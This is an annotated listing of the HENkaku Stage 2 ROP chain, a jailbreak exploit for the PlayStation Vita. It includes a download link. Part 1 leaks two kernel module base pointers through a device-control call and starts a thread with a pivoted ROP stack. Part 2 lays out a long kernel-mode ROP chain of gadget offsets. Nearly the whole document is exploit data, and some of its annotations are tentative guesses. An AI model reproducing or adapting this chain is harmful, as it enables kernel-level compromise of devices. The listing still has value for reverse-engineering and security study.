  1. /*
  2. HENkaku Exploit (annotated Stage 2 ROP chain) - https://www.sendspace.com/file/3k3qgw
     Notation: the left-hand ranges appear to be byte offsets into the stage data; [exploit + X] is the 32-bit word at offset X of the exploit buffer; sceWebKit + X and sceLibKernel_* are addresses relative to the SceWebKit / SceLibKernel modules; "KernelModule1/2 Base" are the two kernel pointers leaked in PART 1.
  3.  
  4. */
  5.  
  6. /*
  7. PART 1 - Kernel Pointers Leak
  8. */
  9. 0x00000000-0x00000018: strcpy(exploit+0x86B4,"sdstor0:");
  10. 0x0000001C-0x0000003C: strcpy(exploit+0x86CC,"xmc-lp-ign-userext");
  11. 0x00000040-0x00000064: memset(exploit+0x6F34,0,0x400); // zero the 0x400-byte devctl output buffer; both leaked kernel pointers below are read out of this buffer
  12. 0x00000068-0x00000084: strcpy(exploit+0x86E4,"molecule0:");
  13. 0x00000088-0x000000AC: sceLibKernel_export_sub0x0000A4AD("molecule0:");// return value (R0) is not kept
  14. 0x000000B0-0x000000DC: sceLibKernel_export_sub0x0000A55D("sdstor0:",5,"xmc-lp-ign-userext",0x14,exploit + 0x00006F34,0x000003FF);//sceIoDevctl? (if so: dev, cmd 5, indata, inlen 0x14, outdata exploit+0x6F34, outlen 0x3FF — argument roles are inferred from that guess, not confirmed)
  15. 0x000000E0-0x00000114: [exploit + 0x00008464] = [exploit + 0x00007308] - 22343 (0x5747) // LEAKED POINTER 1 --> KernelModule1 Base; 0x7308 = 0x6F34 + 0x3D4, i.e. inside the devctl output buffer
  16. 0x00000118-0x0000015c: pln_threadUID{exploit + 0x00008E94} = sceKernelCreateThread("pln", ThreadProc[LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}], /*PRIORITY*/0x10000100,0x2000/*stackSize*/,0,0,0); // the entry gadget loads R1,R2,R4,R8,R11,SP and PC from the thread-argument block, so the argument block doubles as a register set + stack pivot (same register list as the sceWebKit+0x54C8 entry used for the "mhm" thread below)
  17. 0x00000160-0x0000017c: [exploit + 0x0000862C] = 0x7C // sizeof(SceKernelThreadInfo);
  18. 0x00000180-0x0000019c: int sceKernelGetThreadInfo([pln_threadUID{exploit + 0x00008E94}],exploit + 0x0000862C);
  19.  
  20. 0x000001A0-0x000001D4: [exploit + 0x00008EA0] = [exploit + 0x00008660 AKA pln_threadInfo + 0x34 AKA SceKernelThreadInfo.stack(void*)] + 0x00001000
  21. /* //// create pln thread proc ROP-chain //// */
  22. // syscall extra params, set #1 (pointer stored at [0x873C] for the first devctl in the pln chain)
  23. 0x000001D8-0x000001F4: [exploit + 0x00008954] = 0x14
  24. 0x000001F8-0x00000214: [exploit + 0x00008958] = exploit + 0x00006F34
  25. 0x00000218-0x00000234: [exploit + 0x0000895C] = 0x000003FF
  26. // syscall extra params, set #2 (pointer stored at [0x8784] for the second devctl in the pln chain):
  27. 0x00000238-0x00000254: [exploit + 0x0000896C] = 0x00000400
  28. 0x00000258-0x00000274: [exploit + 0x00008970] = 0
  29. 0x00000278-0x00000294: [exploit + 0x00008974] = 0
  30.  
  31. 0x00000298-0x000002B8: [exploit + 0x00008708] = sceWebKit + 0x008DD9B5 // POP {R0-R5,PC} — first slot of the pln ROP chain (0x8708..0x879B)
  32. 0x000002BC-0x000002D4: [exploit + 0x0000870C] = exploit + 0x000086E4 // copy of "molecule0:"
  33. 0x000002D8-0x000002F4: [exploit + 0x00008710] = 0
  34. 0x000002F8-0x00000314: [exploit + 0x00008714] = 0
  35. 0x00000318-0x00000334: [exploit + 0x00008718] = 0
  36. 0x00000338-0x00000354: [exploit + 0x0000871C] = sceLibKernel_export_sub0x0000A4AD
  37. 0x00000358-0x00000374: [exploit + 0x00008720] = 0
  38. 0x00000378-0x00000394: [exploit + 0x00008724] = sceWebKit + 0x000FCDBB // BLX R4 ; POP {R4,PC} — calls the function popped into R4 above
  39. 0x00000398-0x000003B4: [exploit + 0x00008728] = 0
  40. 0x000003B8-0x000003D4: [exploit + 0x0000872C] = sceWebKit + 0x008DD9B5 // POP {R0-R5,PC}
  41. 0x000003D8-0x000003F4: [exploit + 0x00008730] = exploit + 0x000086B4 //copy of "sdstor0:"
  42. 0x000003F8-0x00000414: [exploit + 0x00008734] = 5
  43. 0x00000418-0x00000434: [exploit + 0x00008738] = exploit + 0x000086CC //copy of "xmc-lp-ign-userext"
  44. 0x00000438-0x00000454: [exploit + 0x0000873C] = exploit + 0x00008954//syscall extra params
  45. 0x00000458-0x00000474: [exploit + 0x00008740] = sceLibKernel_import_sub0x0000690C // (syscall) sceIoDevCtl?
  46. 0x00000478-0x00000494: [exploit + 0x00008744] = 0
  47. 0x00000498-0x000004B4: [exploit + 0x00008748] = sceWebKit + 0x000FCDBB // BLX R4 ; POP {R4,PC}
  48. 0x000004B8-0x000004D4: [exploit + 0x0000874C] = 0
  49. 0x000004D8-0x000004F4: [exploit + 0x00008750] = sceWebKit + 0x008DD9B5 // POP {R0-R5,PC}
  50. 0x000004F8-0x00000514: [exploit + 0x00008754] = 0x000F4240 (1000000)
  51. 0x00000518-0x00000534: [exploit + 0x00008758] = 0
  52. 0x00000538-0x00000554: [exploit + 0x0000875C] = 0
  53. 0x00000558-0x00000574: [exploit + 0x00008760] = 0
  54. 0x00000578-0x00000594: [exploit + 0x00008764] = sceKernelDelayThread(1000000 /* 1 sec */);
  55. 0x00000598-0x000005B4: [exploit + 0x00008768] = 0
  56. 0x000005B8-0x000005D4: [exploit + 0x0000876C] = sceWebKit + 0x000FCDBB // BLX R4 ; POP {R4,PC}
  57. 0x000005D8-0x000005F4: [exploit + 0x00008770] = 0
  58. //map memory by kernel?:
  59. 0x000005F8-0x00000614: [exploit + 0x00008774] = sceWebKit + 0x008DD9B5 // POP {R0-R5,PC}
  60. 0x00000618-0x00000634: [exploit + 0x00008778] = exploit + 0x000086B4 // copy of "sdstor0:"
  61. 0x00000638-0x00000654: [exploit + 0x0000877C] = 5 //cmd
  62. 0x00000658-0x00000674: [exploit + 0x00008780] = exploit + 0x00007444 //parg
  63. 0x00000678-0x00000694: [exploit + 0x00008784] = exploit + 0x0000896C //syscall extra params
  64. 0x00000698-0x000006B4: [exploit + 0x00008788] = sceLibKernel_import_sub0x0000690C // (syscall) sceIoDevCtl
  65. 0x000006B8-0x000006D4: [exploit + 0x0000878C] = 0
  66. 0x000006D8-0x000006F4: [exploit + 0x00008790] = sceWebKit + 0x000FCDBB // BLX R4 ; POP {R4,PC}
  67. 0x000006F8-0x00000714: [exploit + 0x00008794] = 0
  68. 0x00000718-0x00000734: [exploit + 0x00008798] = sceWebKit + 0x00000519 // INFINITE LOOP — the pln thread never returns from its chain
  69. /* //// end of pln thread proc ROP-chain //// */
  70. 0x00000738-0x0000075C: sceLibC_sub0x00013F01([exploit + 0x00008EA0],exploit + 0x00008708,0x100);//memcpy(pln stack + 0x1000, rop chain, 0x100) — the chain itself is 0x94 bytes (0x8708..0x879B), so a few trailing bytes are copied as well
  71. 0x00000760-0x0000077C: [exploit + 0x00008830] = [exploit + 0x00008EA0] <- new SP for thread
  72. 0x00000780-0x0000079C: [exploit + 0x00008834] = sceWebKit + 0x000C048B - POP {PC} <- new PC for thread
  73. 0x000007A0-0x000007C4: sceKernelStartThread([pln_threadUID{exploit + 0x00008E94}],0x1C/*arglen*/, exploit + 0x0000881C/*arg*/); // arg block = 7 words (0x1C bytes) consumed by the LDMIA entry gadget: SP comes from arg+0x14 = 0x8830 and PC from arg+0x18 = 0x8834, matching the two stores above
  74. 0x000007C8-0x000007DC: sceKernelDelayThread(0x000186A0/* 100000 us = 0.1 s (0x186A0 is 100000, not 1000000) */);//sync
  75. 0x000007E0-0x00000814: [exploit + 0x00008458] = [exploit + 0x000072F8] + 0xFFFFF544 (== - 0xABC with 32-bit wrap) //LEAKED POINTER 2 -> KernelModule2 Base; 0x72F8 = 0x6F34 + 0x3C4, i.e. inside the devctl output buffer
  76. /*
  77. PART 2 - Create Kernel Mode Thread ROP
  78. */
  79. 0x00000818-0x0000084C: [exploit + 0x00007444] = [exploit + 0x00008464] + 0x0001E460 // first word of the buffer the pln thread passes as parg to its second devctl (parg = exploit+0x7444); the kernel-thread ROP is copied directly behind it at 0x7448
  80. 0x00000850-0x0000089C: [exploit + 0x00008EAC] = [exploit + 0x00008458] + 0x000006F8 + 0x00000300
  81.  
  82. 0x000008A0-0x000008D4: [exploit + 0x00008A8C] = [exploit + 0x00008464] + 0x31
  83. 0x000008D8-0x000008F4: [exploit + 0x00008A90] = 0x08106803
  84. 0x000008F8-0x0000092C: [exploit + 0x00008A94] = [exploit + 0x00008464] + 0x0001EFF1
  85. 0x00000930-0x0000094C: [exploit + 0x00008A98] = 0x38
  86. 0x00000950-0x00000984: [exploit + 0x00008A9C] = [exploit + 0x00008464] + 0x0001EFE1
  87. 0x00000988-0x000009BC: [exploit + 0x00008AA0] = [exploit + 0x00008464] + 0x00000347
  88. 0x000009C0-0x000009F4: [exploit + 0x00008AA4] = [exploit + 0x00008464] + 0x000039EB
  89. 0x000009F8-0x00000A2C: [exploit + 0x00008AA8] = [exploit + 0x00008464] + 0x0001B571
  90. 0x00000A30-0x00000A4C: [exploit + 0x00008AAC] = 0
  91. 0x00000A50-0x00000A84: [exploit + 0x00008AB0] = [exploit + 0x00008464] + 0x00001E43
  92. 0x00000A88-0x00000AA4: [exploit + 0x00008AB4] = 0
  93. 0x00000AA8-0x00000ADC: [exploit + 0x00008AB8] = [exploit + 0x00008464] + 0x0001FC6D
  94. 0x00000AE0-0x00000B14: [exploit + 0x00008ABC] = [exploit + 0x00008464] + 0x0000EA73
  95. 0x00000B18-0x00000B4C: [exploit + 0x00008AC0] = [exploit + 0x00008464] + 0x31
  96. 0x00000B50-0x00000B84: [exploit + 0x00008AC4] = [exploit + 0x00008464] + 0x00027913
  97. 0x00000B88-0x00000BBC: [exploit + 0x00008AC8] = [exploit + 0x00008464] + 0x0000A523
  98. 0x00000BC0-0x00000BF4: [exploit + 0x00008ACC] = [exploit + 0x00008464] + 0x00000347
  99. 0x00000BF8-0x00000C2C: [exploit + 0x00008AD0] = [exploit + 0x00008464] + 0x00000CE3
  100. 0x00000C30-0x00000C64: [exploit + 0x00008AD4] = [exploit + 0x00008464] + 0x00000347
  101. 0x00000C68-0x00000C9C: [exploit + 0x00008AD8] = [exploit + 0x00008464] + 0x0001F2B1
  102. 0x00000CA0-0x00000CD4: [exploit + 0x00008ADC] = [exploit + 0x00008464] + 0x67
  103. 0x00000CD8-0x00000D0C: [exploit + 0x00008AE0] = [exploit + 0x00008464] + 0x0000587F
  104. 0x00000D10-0x00000D44: [exploit + 0x00008AE4] = [exploit + 0x00008464] + 0x00019713
  105. 0x00000D48-0x00000D7C: [exploit + 0x00008AE8] = [exploit + 0x00008464] + 0x00001605
  106. 0x00000D80-0x00000DB4: [exploit + 0x00008AEC] = [exploit + 0x00008464] + 0x00001E1D
  107. 0x00000DB8-0x00000DD4: [exploit + 0x00008AF0] = 0
  108. 0x00000DD8-0x00000E0C: [exploit + 0x00008AF4] = [exploit + 0x00008464] + 0x0001EFE1
  109. 0x00000E10-0x00000E44: [exploit + 0x00008AF8] = [exploit + 0x00008464] + 0x347
  110. 0x00000E48-0x00000E7C: [exploit + 0x00008AFC] = [exploit + 0x00008464] + 0x00001603
  111. 0x00000E80-0x00000EB4: [exploit + 0x00008B00] = [exploit + 0x00008464] + 0x0001F2B1
  112. 0x00000EB8-0x00000EEC: [exploit + 0x00008B04] = [exploit + 0x00008464] + 0x00001F17
  113. 0x00000EF0-0x00000F24: [exploit + 0x00008B08] = [exploit + 0x00008464] + 0x00000347
  114. 0x00000F28-0x00000F5C: [exploit + 0x00008B0C] = [exploit + 0x00008464] + 0x31
  115. 0x00000F60-0x00000F94: [exploit + 0x00008B10] = [exploit + 0x00008464] + 0x0000B913
  116. 0x00000F98-0x00000FCC: [exploit + 0x00008B14] = [exploit + 0x00008464] + 0x00023B61
  117. 0x00000FD0-0x00001004: [exploit + 0x00008B18] = [exploit + 0x00008464] + 0x00000347
  118.  
  119. 0x00001008-0x0000103C: [exploit + 0x00008B1C] = [exploit + 0x00008464] + 0x000039EB
  120.  
  121. 0x00001040-0x00001074: [exploit + 0x00008B20] = [exploit + 0x00008464] + 0x000232EB
  122.  
  123. 0x00001078-0x000010AC: [exploit + 0x00008B24] = [exploit + 0x00008464] + 0x00000347
  124.  
  125. 0x000010B0-0x000010E4: [exploit + 0x00008B28] = [exploit + 0x00008464] + 0x0001B571
  126.  
  127. 0x000010E8-0x0000111C: [exploit + 0x00008B2C] = [exploit + 0x00008464] + 0x00023B61
  128.  
  129. 0x00001120-0x00001154: [exploit + 0x00008B30] = [exploit + 0x00008464] + 0x000232F1
  130.  
  131. 0x00001158-0x0000118C: [exploit + 0x00008B34] = [exploit + 0x00008464] + 0x00001411
  132.  
  133. 0x00001190-0x000011C4: [exploit + 0x00008B38] = [exploit + 0x00008464] + 0x00000AE1
  134.  
  135. 0x000011C8-0x000011FC: [exploit + 0x00008B3C] = [exploit + 0x00008464] + 0x00000347
  136.  
  137. 0x00001200-0x00001234: [exploit + 0x00008B40] = [exploit + 0x00008464] + 0x000050E9
  138.  
  139. 0x00001238-0x0000126C: [exploit + 0x00008B44] = [exploit + 0x00008464] + 0x00001411
  140. 0x00001270-0x0000128C: [exploit + 0x00008B48] = 0x00000010
  141. 0x00001290-0x000012C4: [exploit + 0x00008B4C] = [exploit + 0x00008464] + 0x0001F2B1
  142.  
  143. 0x000012C8-0x000012FC: [exploit + 0x00008B50] = [exploit + 0x00008464] + 0x00012B11
  144.  
  145. 0x00001300-0x00001334: [exploit + 0x00008B54] = [exploit + 0x00008464] + 0x00000CE3
  146.  
  147. 0x00001338-0x0000136C: [exploit + 0x00008B58] = [exploit + 0x00008464] + 0x000000D1
  148.  
  149. 0x00001370-0x000013A4: [exploit + 0x00008B5C] = [exploit + 0x00008464] + 0x00000347
  150.  
  151. 0x000013A8-0x000013DC: [exploit + 0x00008B60] = [exploit + 0x00008464] + 0x0001F2B1
  152.  
  153. 0x000013E0-0x00001414: [exploit + 0x00008B64] = [exploit + 0x00008464] + 0x00000347
  154.  
  155. 0x00001418-0x0000144C: [exploit + 0x00008B68] = [exploit + 0x00008464] + 0x000039EB
  156.  
  157. 0x00001450-0x00001484: [exploit + 0x00008B6C] = [exploit + 0x00008464] + 0x0001FDC5
  158.  
  159. 0x00001488-0x000014BC: [exploit + 0x00008B70] = [exploit + 0x00008464] + 0x0001D8DB
  160.  
  161. 0x000014C0-0x000014F4: [exploit + 0x00008B74] = [exploit + 0x00008464] + 0x00019399
  162.  
  163. 0x000014F8-0x0000152C: [exploit + 0x00008B78] = [exploit + 0x00008464] + 0x00019399
  164.  
  165. 0x00001530-0x00001564: [exploit + 0x00008B7C] = [exploit + 0x00008464] + 0x00011C5F
  166.  
  167. 0x00001568-0x0000159C: [exploit + 0x00008B80] = [exploit + 0x00008464] + 0x00019399
  168.  
  169. 0x000015A0-0x000015D4: [exploit + 0x00008B84] = [exploit + 0x00008464] + 0x00000347
  170.  
  171. 0x000015D8-0x0000160C: [exploit + 0x00008B88] = [exploit + 0x00008464] + 0x0000B913
  172. 0x00001610-0x0000162C: [exploit + 0x00008B8C] = 0x00000000
  173. 0x00001630-0x00001664: [exploit + 0x00008B90] = [exploit + 0x00008464] + 0x0001EFE1
  174.  
  175. 0x00001668-0x0000169C: [exploit + 0x00008B94] = [exploit + 0x00008464] + 0x00000347
  176.  
  177. 0x000016A0-0x000016D4: [exploit + 0x00008B98] = [exploit + 0x00008464] + 0x00001861
  178.  
  179. 0x000016D8-0x0000170C: [exploit + 0x00008B9C] = [exploit + 0x00008464] + 0x0001FC6D
  180.  
  181. 0x00001710-0x00001744: [exploit + 0x00008BA0] = [exploit + 0x00008464] + 0x0001F2B1
  182.  
  183. 0x00001748-0x0000177C: [exploit + 0x00008BA4] = [exploit + 0x00008464] + 0x00000347
  184.  
  185. 0x00001780-0x000017B4: [exploit + 0x00008BA8] = [exploit + 0x00008464] + 0x000039EB
  186.  
  187. 0x000017B8-0x000017EC: [exploit + 0x00008BAC] = [exploit + 0x00008464] + 0x00019399
  188.  
  189. 0x000017F0-0x00001824: [exploit + 0x00008BB0] = [exploit + 0x00008464] + 0x00000347
  190.  
  191. 0x00001828-0x0000185C: [exploit + 0x00008BB4] = [exploit + 0x00008464] + 0x00019399
  192.  
  193. 0x00001860-0x00001894: [exploit + 0x00008BB8] = [exploit + 0x00008464] + 0x00000347
  194.  
  195. 0x00001898-0x000018CC: [exploit + 0x00008BBC] = [exploit + 0x00008464] + 0x000039EB
  196.  
  197. 0x000018D0-0x00001904: [exploit + 0x00008BC0] = [exploit + 0x00008464] + 0x0001614D
  198.  
  199. 0x00001908-0x0000193C: [exploit + 0x00008BC4] = [exploit + 0x00008464] + 0x000233D3
  200.  
  201. 0x00001940-0x00001974: [exploit + 0x00008BC8] = [exploit + 0x00008464] + 0x0001F2B1
  202.  
  203. 0x00001978-0x000019AC: [exploit + 0x00008BCC] = [exploit + 0x00008464] + 0x00000347
  204.  
  205. 0x000019B0-0x000019E4: [exploit + 0x00008BD0] = [exploit + 0x00008464] + 0x000000AF
  206.  
  207. 0x000019E8-0x00001A1C: [exploit + 0x00008BD4] = [exploit + 0x00008464] + 0x00001605
  208.  
  209. 0x00001A20-0x00001A54: [exploit + 0x00008BD8] = [exploit + 0x00008464] + 0x0001EFE1
  210.  
  211. 0x00001A58-0x00001A8C: [exploit + 0x00008BDC] = [exploit + 0x00008464] + 0x00000347
  212.  
  213. 0x00001A90-0x00001AC4: [exploit + 0x00008BE0] = [exploit + 0x00008464] + 0x000050E9
  214.  
  215. 0x00001AC8-0x00001AFC: [exploit + 0x00008BE4] = [exploit + 0x00008464] + 0x000039EB
  216.  
  217. 0x00001B00-0x00001B34: [exploit + 0x00008BE8] = [exploit + 0x00008464] + 0x00001347
  218.  
  219. 0x00001B38-0x00001B6C: [exploit + 0x00008BEC] = [exploit + 0x00008464] + 0x00000347
  220.  
  221. 0x00001B70-0x00001BA4: [exploit + 0x00008BF0] = [exploit + 0x00008464] + 0x000000B9
  222.  
  223. 0x00001BA8-0x00001BDC: [exploit + 0x00008BF4] = [exploit + 0x00008464] + 0x0001F2B1
  224.  
  225. 0x00001BE0-0x00001C14: [exploit + 0x00008BF8] = [exploit + 0x00008464] + 0x00001347
  226.  
  227. 0x00001C18-0x00001C4C: [exploit + 0x00008BFC] = [exploit + 0x00008464] + 0x00000347
  228.  
  229. 0x00001C50-0x00001C84: [exploit + 0x00008C00] = [exploit + 0x00008464] + 0x0000039B
  230. 0x00001C88-0x00001CA4: [exploit + 0x00008C04] = 0x00000000
  231. 0x00001CA8-0x00001CDC: [exploit + 0x00008C08] = [exploit + 0x00008464] + 0x0001CB95
  232.  
  233. 0x00001CE0-0x00001D14: [exploit + 0x00008C0C] = [exploit + 0x00008464] + 0x0001EA93
  234.  
  235. 0x00001D18-0x00001D4C: [exploit + 0x00008C10] = [exploit + 0x00008464] + 0x00001411
  236.  
  237. 0x00001D50-0x00001D84: [exploit + 0x00008C14] = [exploit + 0x00008464] + 0x00000347
  238.  
  239. 0x00001D88-0x00001DBC: [exploit + 0x00008C18] = [exploit + 0x00008464] + 0x000209D7
  240.  
  241. 0x00001DC0-0x00001DF4: [exploit + 0x00008C1C] = [exploit + 0x00008464] + 0x000209D3
  242.  
  243. 0x00001DF8-0x00001E2C: [exploit + 0x00008C20] = [exploit + 0x00008464] + 0x00001411
  244.  
  245. 0x00001E30-0x00001E64: [exploit + 0x00008C24] = [exploit + 0x00008464] + 0x00000347
  246.  
  247. 0x00001E68-0x00001E9C: [exploit + 0x00008C28] = [exploit + 0x00008464] + 0x0001BAF5
  248.  
  249. 0x00001EA0-0x00001ED4: [exploit + 0x00008C2C] = [exploit + 0x00008464] + 0x00001605
  250.  
  251. 0x00001ED8-0x00001F0C: [exploit + 0x00008C30] = [exploit + 0x00008464] + 0x00000347
  252.  
  253. 0x00001F10-0x00001F44: [exploit + 0x00008C34] = [exploit + 0x00008464] + 0x0000652B
  254.  
  255. 0x00001F48-0x00001F7C: [exploit + 0x00008C38] = [exploit + 0x00008464] + 0x00000347
  256.  
  257. 0x00001F80-0x00001FB4: [exploit + 0x00008C3C] = [exploit + 0x00008464] + 0x0001BAF5
  258.  
  259. 0x00001FB8-0x00001FEC: [exploit + 0x00008C40] = [exploit + 0x00008464] + 0x00022A49
  260. 0x00001FF0-0x0000200C: [exploit + 0x00008C44] = 0xFFFFFEB0
  261. 0x00002010-0x00002044: [exploit + 0x00008C48] = [exploit + 0x00008464] + 0x0000039B
  262. 0x00002048-0x00002064: [exploit + 0x00008C4C] = 0x00000040
  263. 0x00002068-0x0000209C: [exploit + 0x00008C50] = [exploit + 0x00008464] + 0x00022A49
  264.  
  265. 0x000020A0-0x000020D4: [exploit + 0x00008C54] = [exploit + 0x00008464] + 0x00000347
  266.  
  267. 0x000020D8-0x0000210C: [exploit + 0x00008C58] = [exploit + 0x00008464] + 0x0000652B
  268.  
  269. 0x00002110-0x00002144: [exploit + 0x00008C5C] = [exploit + 0x00008464] + 0x00000347
  270.  
  271. 0x00002148-0x0000217C: [exploit + 0x00008C60] = [exploit + 0x00008464] + 0x0000039B
  272. 0x00002180-0x0000219C: [exploit + 0x00008C64] = 0x00000040
  273. 0x000021A0-0x000021D4: [exploit + 0x00008C68] = [exploit + 0x00008464] + 0x00001605
  274.  
  275. 0x000021D8-0x0000220C: [exploit + 0x00008C6C] = [exploit + 0x00008464] + 0x00000347
  276.  
  277. 0x00002210-0x00002244: [exploit + 0x00008C70] = [exploit + 0x00008464] + 0x0001D9EB
  278.  
  279. 0x00002248-0x0000227C: [exploit + 0x00008C74] = [exploit + 0x00008464] + 0x000039EB
  280.  
  281. 0x00002280-0x000022B4: [exploit + 0x00008C78] = [exploit + 0x00008464] + 0x00000853
  282.  
  283. 0x000022B8-0x000022EC: [exploit + 0x00008C7C] = [exploit + 0x00008464] + 0x0001D8DB
  284. 0x000022F0-0x0000230C: [exploit + 0x00008C80] = 0x00000038
  285. 0x00002310-0x00002344: [exploit + 0x00008C84] = [exploit + 0x00008464] + 0x000000AB
  286.  
  287. 0x00002348-0x0000237C: [exploit + 0x00008C88] = [exploit + 0x00008464] + 0x000000D1
  288.  
  289. 0x00002380-0x000023B4: [exploit + 0x00008C8C] = [exploit + 0x00008464] + 0x0002328B
  290.  
  291. 0x000023B8-0x000023EC: [exploit + 0x00008C90] = [exploit + 0x00008464] + 0x00022FCD
  292.  
  293. 0x000023F0-0x00002424: [exploit + 0x00008C94] = [exploit + 0x00008464] + 0x000000D1
  294.  
  295. 0x00002428-0x0000245C: [exploit + 0x00008C98] = [exploit + 0x00008464] + 0x0001EFF1
  296.  
  297. 0x00002460-0x00002494: [exploit + 0x00008C9C] = [exploit + 0x00008464] + 0x0002A117
  298.  
  299. 0x00002498-0x000024CC: [exploit + 0x00008CA0] = [exploit + 0x00008464] + 0x00000347
  300.  
  301. 0x000024D0-0x00002504: [exploit + 0x00008CA4] = [exploit + 0x00008464] + 0x00001605
  302.  
  303. 0x00002508-0x0000253C: [exploit + 0x00008CA8] = [exploit + 0x00008464] + 0x00019399
  304.  
  305. 0x00002540-0x00002574: [exploit + 0x00008CAC] = [exploit + 0x00008464] + 0x00000347
  306.  
  307. 0x00002578-0x000025AC: [exploit + 0x00008CB0] = [exploit + 0x00008464] + 0x000039EB
  308.  
  309. 0x000025B0-0x000025E4: [exploit + 0x00008CB4] = [exploit + 0x00008464] + 0x0001BF1F
  310. 0x000025E8-0x00002604: [exploit + 0x00008CB8] = 0xFFFFFEB0
  311. 0x00002608-0x0000263C: [exploit + 0x00008CBC] = [exploit + 0x00008464] + 0x0000039B
  312. 0x00002640-0x0000265C: [exploit + 0x00008CC0] = 0x00000040
  313. 0x00002660-0x00002694: [exploit + 0x00008CC4] = [exploit + 0x00008464] + 0x00022A49
  314.  
  315. 0x00002698-0x000026CC: [exploit + 0x00008CC8] = [exploit + 0x00008464] + 0x000039EB
  316.  
  317. 0x000026D0-0x00002704: [exploit + 0x00008CCC] = [exploit + 0x00008464] + 0x00003D73
  318. 0x00002708-0x00002724: [exploit + 0x00008CD0] = 0x00000000
  319. 0x00002728-0x0000275C: [exploit + 0x00008CD4] = [exploit + 0x00008464] + 0x000021FD
  320.  
  321. 0x00002760-0x00002794: [exploit + 0x00008CD8] = [exploit + 0x00008464] + 0x00000347
  322.  
  323. 0x00002798-0x000027CC: [exploit + 0x00008CDC] = [exploit + 0x00008464] + 0x000050E9
  324.  
  325. 0x000027D0-0x00002804: [exploit + 0x00008CE0] = [exploit + 0x00008464] + 0x00000AE1
  326.  
  327. 0x00002808-0x0000283C: [exploit + 0x00008CE4] = [exploit + 0x00008464] + 0x00000347
  328.  
  329. 0x00002840-0x00002874: [exploit + 0x00008CE8] = [exploit + 0x00008464] + 0x0002A117
  330.  
  331. 0x00002878-0x000028AC: [exploit + 0x00008CEC] = [exploit + 0x00008464] + 0x00000347
  332.  
  333. 0x000028B0-0x000028E4: [exploit + 0x00008CF0] = [exploit + 0x00008464] + 0x0001F2B1
  334.  
  335. 0x000028E8-0x0000291C: [exploit + 0x00008CF4] = [exploit + 0x00008464] + 0x00000067
  336.  
  337. 0x00002920-0x00002954: [exploit + 0x00008CF8] = [exploit + 0x00008464] + 0x000039EB
  338.  
  339. 0x00002958-0x0000298C: [exploit + 0x00008CFC] = [exploit + 0x00008464] + 0x0001BF47
  340.  
  341. 0x00002990-0x000029C4: [exploit + 0x00008D00] = [exploit + 0x00008464] + 0x00000347
  342.  
  343. 0x000029C8-0x000029FC: [exploit + 0x00008D04] = [exploit + 0x00008464] + 0x000050E9
  344.  
  345. 0x00002A00-0x00002A34: [exploit + 0x00008D08] = [exploit + 0x00008464] + 0x0000AF33
  346.  
  347. 0x00002A38-0x00002A6C: [exploit + 0x00008D0C] = [exploit + 0x00008464] + 0x00000347
  348.  
  349. 0x00002A70-0x00002AA4: [exploit + 0x00008D10] = [exploit + 0x00008464] + 0x0001D9EB
  350. 0x00002AA8-0x00002AC4: [exploit + 0x00008D14] = 0x00000000
  351. 0x00002AC8-0x00002AFC: [exploit + 0x00008D18] = [exploit + 0x00008464] + 0x0001FC6D
  352.  
  353. 0x00002B00-0x00002B34: [exploit + 0x00008D1C] = [exploit + 0x00008464] + 0x0000EA73
  354.  
  355. 0x00002B38-0x00002B6C: [exploit + 0x00008D20] = [exploit + 0x00008464] + 0x0000039B
  356.  
  357. 0x00002B70-0x00002BA4: [exploit + 0x00008D24] = [exploit + 0x00008464] + 0x00000853
  358. 0x00002BA8-0x00002BC4: [exploit + 0x00008D28] = 0xFFFFFFFF
  359. 0x00002BC8-0x00002BE4: [exploit + 0x00008D2C] = 0x08106803
  360. 0x00002BE8-0x00002C1C: [exploit + 0x00008D30] = [exploit + 0x00008464] + 0x000233D3
  361.  
  362. 0x00002C20-0x00002C54: [exploit + 0x00008D34] = [exploit + 0x00008464] + 0x00000347
  363.  
  364. 0x00002C58-0x00002C8C: [exploit + 0x00008D38] = [exploit + 0x00008464] + 0x00000433
  365.  
  366. 0x00002C90-0x00002CC4: [exploit + 0x00008D3C] = [exploit + 0x00008464] + 0x000233D3
  367.  
  368. 0x00002CC8-0x00002CFC: [exploit + 0x00008D40] = [exploit + 0x00008464] + 0x000150A3
  369.  
  370. 0x00002D00-0x00002D1C: [exploit + 0x00008D44] = 0x00000000
  371. 0x00002D20-0x00002D54: [exploit + 0x00008D48] = [exploit + 0x00008464] + 0x0000A74D
  372.  
  373. 0x00002D58-0x00002D8C: [exploit + 0x00008D4C] = [exploit + 0x00008464] + 0x00000000
  374.  
  375. 0x00002D90-0x00002DC4: [exploit + 0x00008D50] = [exploit + 0x00008464] + 0x00000853
  376.  
  377. 0x00002DC8-0x00002DFC: [exploit + 0x00008D54] = [exploit + 0x00008464] + 0x0001BF1F
  378.  
  379. 0x00002E00-0x00002E1C: [exploit + 0x00008D58] = 0x00000000
  380. 0x00002E20-0x00002E54: [exploit + 0x00008D5C] = [exploit + 0x00008464] + 0x00001605
  381.  
  382. 0x00002E58-0x00002E8C: [exploit + 0x00008D60] = [exploit + 0x00008464] + 0x00000347
  383.  
  384. 0x00002E90-0x00002EC4: [exploit + 0x00008D64] = [exploit + 0x00008464] + 0x000050E9
  385.  
  386. 0x00002EC8-0x00002EFC: [exploit + 0x00008D68] = [exploit + 0x00008464] + 0x00001605
  387.  
  388. 0x00002F00-0x00002F34: [exploit + 0x00008D6C] = [exploit + 0x00008464] + 0x00022FCD
  389.  
  390. 0x00002F38-0x00002F6C: [exploit + 0x00008D70] = [exploit + 0x00008464] + 0x000039EB
  391.  
  392. 0x00002F70-0x00002FA4: [exploit + 0x00008D74] = [exploit + 0x00008464] + 0x00000853
  393.  
  394. 0x00002FA8-0x00002FDC: [exploit + 0x00008D78] = [exploit + 0x00008464] + 0x00011C5F
  395. 0x00002FE0-0x00002FFC: [exploit + 0x00008C04] = [exploit + 0x00008EAC] // this and the next four stores patch slots that were pre-filled above: 0x8C04 (was 0), 0x8B48 (was 0x10), 0x8CC0 (was 0x40), 0x8D58 (was 0), 0x8D14 (was 0)
  396. 0x00003000-0x0000301C: [exploit + 0x00008B48] = 0x00000090
  397. 0x00003020-0x0000303C: [exploit + 0x00008CC0] = 0x00000240
  398. 0x00003040-0x0000305C: [exploit + 0x00008D58] = 0x00000200
  399. 0x00003060-0x0000307C: [exploit + 0x00008D14] = exploit + 0x00008FC0
